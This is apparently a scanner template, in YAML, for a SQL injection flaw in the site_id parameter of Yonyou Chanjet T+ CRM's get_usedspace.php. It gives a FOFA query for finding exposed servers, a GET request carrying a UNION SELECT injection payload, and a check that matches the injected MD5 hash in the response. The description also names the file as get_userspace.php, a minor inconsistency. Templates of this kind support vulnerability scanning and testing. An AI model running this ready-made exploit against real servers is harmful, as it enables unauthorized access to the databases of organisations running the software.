product: 用友畅捷通-TPlus
vName: 用友畅捷通-TPlus 畅捷CRM get_usedspace.php SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 用友畅捷通-TPlus CRM get_userspace.php文件中 site_id参数存在SQL注入漏洞
version: ''
note: ''
search:
  FOFA: app="畅捷通-TPlus" && product="畅捷通-TPlus"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17775830.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /webservice/get_usedspace.php?site_id=-999 UNION ALL SELECT MD5(123456)--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and